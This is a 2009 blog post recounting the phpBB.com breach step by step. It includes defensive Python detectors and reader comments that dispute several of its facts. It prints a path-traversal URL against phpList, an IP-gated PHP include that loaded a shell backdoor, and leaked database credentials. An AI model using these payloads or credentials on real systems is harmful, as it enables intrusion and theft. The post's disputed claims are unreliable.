How PHPBB Site was Hacked and How You Can Prevent it

By Angsuman Chakraborty, Gaea News Network
Thursday, February 5, 2009

The simplest way to start this topic is: phpBB has been hacked. You must have heard of it by now, and there is an equal chance that you haven't. A community with almost 200,000 human members and 400,000 subscribed users has lost its privacy inside that community, and there was nothing phpBB could do but put up a foolish status message like the one shown below.

But the question is, how did the hacker (call him a script kiddie if you like, but I don't think 90% of the people naming him that could do half of what he did; no glorification intended) do it? Here is a step-by-step description.

1. The Vulnerability

phpList is generally located at website_name/phplist. The hacker went there and found that the forum admins were running an old version of it. Much to his amazement, and ours too, it was older than the version that had taken care of the well-known milw0rm exploit. He used it. Isn't it obvious?

2. Attacking /etc/passwd

Anyone with even a cent's worth of PHP knowledge knows what this file looks like and why it is read first. He went after it through the vulnerability mentioned above, working through a proxy.

His Target Link: http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd

Needless to say, he found it.

3. Reaching httpd.conf

The httpd.conf file is the main configuration file for the Apache web server; directory indexing, HostnameLookups and similar settings are all controlled from it, so reading it tells you how the server is laid out. So he moved on to /etc/httpd/conf/httpd.conf.

4. Coding the Error Log

In recent times we have seen that the error log can be seeded with injected code (log poisoning) and then pulled in through the same file-inclusion hole. So that was the best place for him to run his code, work out exactly where the indexing was happening, and derive the hash used for the community profiles. As I said, he found that the hash was f51ee61fe7a83fdf72780912bced0855, and he uploaded his avatar there so that he could gain access to administrative privileges.

The direct path: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
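
Added here as an illustration, not from the original post: a small log-triage script (Python, defender's side) that flags requests shaped like the ones in steps 1 to 4 in Apache access-log lines, decoding repeated percent-encoding so `%252e%252e%252f` is recognised as `../` and treating a 200 on a sensitive-file probe as a likely success. The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (documentation IP ranges, not real
# phpbb.com traffic); the first two mirror the requests described above.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Feb/2009:10:01:02 +0000] "GET /lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd HTTP/1.1" 200 1423 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Feb/2009:10:01:09 +0000] "GET /lists/admin/index.php?_SERVER%5bConfigFile%5d=%252e%252e%252f%252e%252e%252fetc%252fhttpd%252fconf%252fhttpd.conf HTTP/1.1" 200 9811 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Feb/2009:10:02:00 +0000] "GET /community/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Feb/2009:10:03:30 +0000] "GET /community/index.php HTTP/1.1" 404 210 "-" "<?php echo 1; ?>"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse(line):
    """Return (ip, findings, severity); None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_fully(m['target'])
    findings = []
    if '../' in target or '..\\' in target:
        findings.append('path-traversal')
    if '_SERVER[' in target:                     # request parameter overriding $_SERVER
        findings.append('superglobal-override')
    if re.search(r'/etc/(passwd|shadow)|httpd\.conf', target):
        findings.append('sensitive-file')
    if '<?php' in decode_fully(m['ua']) or '<?php' in decode_fully(m['referer']):
        findings.append('log-poisoning-payload')   # PHP planted so a log include runs it
    if not findings:
        return (m['ip'], [], 'none')
    # A 200 on a sensitive-file probe means the server most likely served the file.
    severity = 'high' if 'sensitive-file' in findings and m['status'] == '200' else 'medium'
    return (m['ip'], findings, severity)

def scan(lines):
    return [r for r in map(analyse, lines) if r and r[1]]
```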

5. Second Vulnerability

cat /home/virtual/phpbb.com/community/config.php is where you find the config details. But how on earth couldn't the password at least be encrypted? It just made things easier for him.

And here is what he found:

$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';

phpList

$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';

6. Cracking Others’ Passwords

There was not much left. He found some of the other admins' passwords. One funny thing: someone had his password set to phpbb! How on earth could nobody have brute-forced it? I wonder too.

7. The Final Blow: Getting the Full Database

The hacker got all the entries of user_id and user_password. The users' passwords were stored as unsalted md5 and the admins' passwords as an ordinary hash. If you have ever been a forum admin of a PHP-enabled site, you know you only need a MySQL UPDATE on one of the admin accounts and you are in. Or, if you change their password to yours, you can use the recover-password function, update the list in SQL and save it to a log file, which is what he eventually did. But again, a recover-password flow as primitive as a normal user's for an admin? Oh, phpBB, you were waiting for a punishment I guess.
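
Added example, not code from this post or from phpBB: why unsalted md5 is a liability and how a site can migrate away from it without forcing resets. Two constructed accounts share the password phpbb mentioned above; their identical digests expose that fact with no cracking at all, whereas the salted PBKDF2 entries differ per user, and the login function re-hashes a legacy entry the first time it verifies. Names, passwords and the storage format are assumptions.

```python
import hashlib
import hmac
import os

# Constructed account table: two legacy entries stored as unsalted md5, as the
# article describes, both using the password "phpbb" mentioned above, and one
# account already on a salted PBKDF2 hash. Names and passwords are made up.
def legacy_md5(password):
    return hashlib.md5(password.encode()).hexdigest()

def make_salted(password, rounds=200_000):
    """Per-user random salt plus a slow KDF; format: pbkdf2_sha256$rounds$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, rounds)
    return f'pbkdf2_sha256${rounds}${salt.hex()}${digest.hex()}'

def check_salted(stored, password):
    _, rounds, salt_hex, digest_hex = stored.split('$')
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)

USERS = {
    'alice': legacy_md5('phpbb'),
    'bob':   legacy_md5('phpbb'),
    'carol': make_salted('correct horse'),
}

def shared_password_groups(users):
    """Identical unsalted digests reveal who shares a password, with no cracking."""
    by_digest = {}
    for name, stored in users.items():
        if '$' not in stored:                    # legacy md5 entry
            by_digest.setdefault(stored, []).append(name)
    return [sorted(g) for g in by_digest.values() if len(g) > 1]

def login(users, name, password):
    """Verify a password; a legacy entry is re-hashed on its first successful login."""
    stored = users.get(name)
    if stored is None:
        return False
    if stored.startswith('pbkdf2_sha256$'):
        return check_salted(stored, password)
    if hmac.compare_digest(stored, legacy_md5(password)):
        users[name] = make_salted(password)      # transparent migration off md5
        return True
    return False
```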

8. Writing a Shell Script

This could be a mini tutorial in itself. But what he did here was practically rent a permanent room for himself inside the admin directory. How?

  • He enabled PHP in template files and added this bit of code to one of the templates:
    $ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}
  • The included file happened to be a shell, r57shell actually.
  • Then he searched for a writable directory, created a PHP file and wrote the shell's source code to it. And there he remained.
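
Added example (not the attacker's code or phpBB's): a scanner a defender could run over the template directory after an incident like step 8, looking for phpBB3-style `<!-- PHP -->` blocks, REMOTE_ADDR gating, includes that reach into the uploads directory, and common obfuscation calls. The template contents, path, hash and IP are constructed placeholders.

```python
import re
import tempfile
from pathlib import Path

# Constructed template bodies: a clean phpBB3-style template and one carrying the
# kind of IP-gated include described above (path, hash and IP are placeholders).
CLEAN = '<html><body>{L_WELCOME} {USERNAME}</body></html>'
TAINTED = ('<!-- PHP --> $ip=$_SERVER["REMOTE_ADDR"]; if($ip == "192.0.2.10")'
           '{include("/srv/community/files/PLACEHOLDER_ID_hash");} <!-- ENDPHP -->')

# Each rule is an indicator, not proof; a hit means a human should read the file.
RULES = {
    'php-in-template': re.compile(r'<!--\s*(PHP|INCLUDEPHP\b)|<\?php', re.I),
    'ip-gate': re.compile(r"""\$_SERVER\[\s*['"]REMOTE_ADDR['"]\s*\]"""),
    'include-of-upload': re.compile(r"""\b(include|require)(_once)?\s*\(\s*['"][^'"]*/files/""", re.I),
    'obfuscation': re.compile(r'\b(eval|base64_decode|gzinflate|str_rot13)\s*\(', re.I),
}

def scan_template(text):
    """Names of every rule that fires on one template's contents."""
    return [name for name, rx in RULES.items() if rx.search(text)]

def scan_dir(root):
    """Map file name -> rule hits for every .html/.tpl template under root."""
    report = {}
    for pattern in ('*.html', '*.tpl'):
        for path in sorted(Path(root).rglob(pattern)):
            hits = scan_template(path.read_text(errors='replace'))
            if hits:
                report[path.name] = hits
    return report

def demo():
    """Write the two constructed templates to a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / 'overall_header.html').write_text(CLEAN)
        (Path(d) / 'overall_footer.html').write_text(TAINTED)
        return scan_dir(d)
```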

Word of Caution

Just my two cents of advice to all webmasters, especially those using PHP applications like Joomla, phpList, WordPress etc.:

  1. Please keep your software updated, always. I know it is a royal pain, but that is the price you pay for getting it cheap (read: free). PHP is a rapid prototyping and development language, which also means anyone, and I mean anyone, can hack up a quick application in a few hours that becomes popular over time through contributions from the open source community. Using a popular PHP application is no guarantee of its safety, as the Mambo / Joomla, WordPress, phpList etc. vulnerabilities have proved time and again.
  2. Please use any means to secure, or at least obfuscate, your passwords to prevent such direct attacks. WordPress, phpBB and many other PHP-based packages store their passwords openly in files, which has been proven time and again to be a bad practice. A vulnerability in any PHP software that lets attackers read plain-text files, like the exploit above, can expose the passwords of every other application on the system that stores them in such an inane way. There are ways to run different applications under different user IDs, which keeps them in their own silos. I will discuss them in a later article.

The biggest note is for PHP application developers. Please, please refrain from keeping clear-text passwords in text files. I am talking to Matt Mullenweg (just because I know his name) of WordPress, and to the Joomla, phpBB, phpList, modX and a host of other PHP-based application developers. I respect what you are doing, but please don't jeopardize the data security of your users.

Game over. Thank you.

Discussion

March 10, 2009: 10:29 am

[...] in the recent past how PHPBB, one of the most important forums for programming related discussions, got hacked. Now, what’s the [...]


igor
February 17, 2009: 8:23 pm

And how exactly would you encrypt the password?


kellanved
February 17, 2009: 12:59 pm

Oh, and another factual mistake: phpList released the patch two weeks after the attacker exploited the vulnerability. The exploit was used within hours of getting published.


Me
February 16, 2009: 6:39 pm

Next to the original hacker post, this is the dumbest blog post I’ve ever read. Why? Because you just went with whatever he said about “better security” and copied most of it as well as his other points about the hack that he pretty much followed a guide to be able to use.

Storing database passwords in plain text SOMEWHERE in the application is pretty much a requirement for ANY web application be it phpBB, WordPress, or the software running on this site or any other web app that would require database access. I doubt you have any suggestions on changing this other than repeating the hacker’s dumb suggestion of encrypting the password, in which case it STILL has to be in plain text somewhere in the app.

There was really nothing that could have been done about a 0-day exploit and, last time I checked, milworm is hardly considered a security source and more a hacking/exploiting site. What this blog should have been doing is blast the actions of the hacker. It was malicious and meant to harm a lot of people and not just the staff of phpBB and private information was not only accessed but RELEASED to the general public. It’s just like a terrorist blowing himself up in the middle of a busy marketplace with no regards for innocent bystanders.

Next time please do your due diligence in research when making your blog posts…


Kellanved
February 16, 2009: 5:31 pm

Hi,
there are a few factual mistakes in the write-up.
a) etc/passwd was empty and not used.
b) It is not possible to encrypt database passwords; even being able to do so does not increase security, as attackers can piggyback on the application's connection. There was no second vulnerability.
c) The passwords were not in an unsalted md5; only about 7% of the accounts were legacy entries from older versions.
d) Requesting a new password has zero security implications in a scenario where the attacker could have written his new password into the database directly. This had no impact at all.
e) No other admin passwords were compromised.

February 7, 2009: 10:01 pm

You could have just linked to http://hackedphpbb.blogspot.com/, where the author describes (in pretty much the _exact_ same way you do), how he did it.

February 6, 2009: 2:34 pm

Great article!

I really liked the step-by-step explanation of the hack


shumisha
February 6, 2009: 10:55 am

Hi

I am interested in this. How exactly would you not store the main DB access password in clear text? If encrypted, how would you store the encryption key needed for decryption, if not in clear text itself?
What are other apps using?
Rgds

February 6, 2009: 9:37 am

The article is a discussion on techniques with the intention to enable websites and php based web application developers to protect themselves.

It is neither intended to be a hacking guide nor to encourage any script kiddies to emulate the techniques, which is why deliberately some crucial details were left out and also the link was not provided.


yuku
February 6, 2009: 9:33 am

It seems that you get most of the information from hackedphpbb.blogspot.com/. However you didn’t provide more information, for example about how the URL “index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd”
will output the etc/passwd file. And why the passwd file need to be obtained?

February 6, 2009: 1:45 am

http://www.phplist.com/?lid=274

That is the exploit the hacker used. He hacked the site weeks before that update was released. We were attacked using a 0-day exploit.

How do you suggest handling configuration files that aren’t in clear text?

February 5, 2009: 9:27 pm

I wanted to know all the circumstances of the hack, thanks for sharing!
